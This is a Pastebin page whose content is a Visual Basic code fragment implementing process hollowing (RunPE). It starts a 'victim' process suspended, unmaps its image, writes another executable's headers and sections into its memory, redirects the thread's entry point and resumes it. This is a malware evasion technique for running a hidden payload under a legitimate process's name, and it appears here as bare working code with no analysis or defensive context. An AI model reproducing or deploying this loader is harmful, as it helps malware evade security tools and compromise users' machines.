Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- If CreateProcess(vbNullString, sVictim, 0, 0, False, CREATE_SUSPENDED, 0, 0, si, pi) = 0 Then
- MsgBox "Can not start victim process!", vbCritical
- Exit Function
- End If
- context.ContextFlags = CONTEXT86_INTEGER
- If GetThreadContext(pi.hThread, context) = 0 Then GoTo ClearProcess
- Call ReadProcessMemory(pi.hProcess, ByVal context.Ebx + 8, addr, 4, 0)
- If addr = 0 Then GoTo ClearProcess
- If ZwUnmapViewOfSection(pi.hProcess, addr) Then GoTo ClearProcess
- ImageBase = VirtualAllocEx(pi.hProcess, ByVal inh.OptionalHeader.ImageBase, inh.OptionalHeader.SizeOfImage, MEM_RESERVE Or MEM_COMMIT, PAGE_READWRITE)
- If ImageBase = 0 Then GoTo ClearProcess
- Call WriteProcessMemory(pi.hProcess, ByVal ImageBase, abExeFile(0), inh.OptionalHeader.SizeOfHeaders, ret)
- lOffset = idh.e_lfanew + Len(inh)
- For i = 0 To inh.FileHeader.NumberOfSections - 1
- CopyMemory ish, abExeFile(lOffset + i * Len(ish)), Len(ish)
- Call WriteProcessMemory(pi.hProcess, ByVal ImageBase + ish.VirtualAddress, abExeFile(ish.PointerToRawData), ish.SizeOfRawData, ret)
- Call VirtualProtectEx(pi.hProcess, ByVal ImageBase + ish.VirtualAddress, ish.VirtualSize, Protect(ish.characteristics), addr)
- Next i
- Call WriteProcessMemory(pi.hProcess, ByVal context.Ebx + 8, ImageBase, 4, ret)
- context.Eax = ImageBase + inh.OptionalHeader.AddressOfEntryPoint
- Call SetThreadContext(pi.hThread, context)
- Call ResumeThread(pi.hThread)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement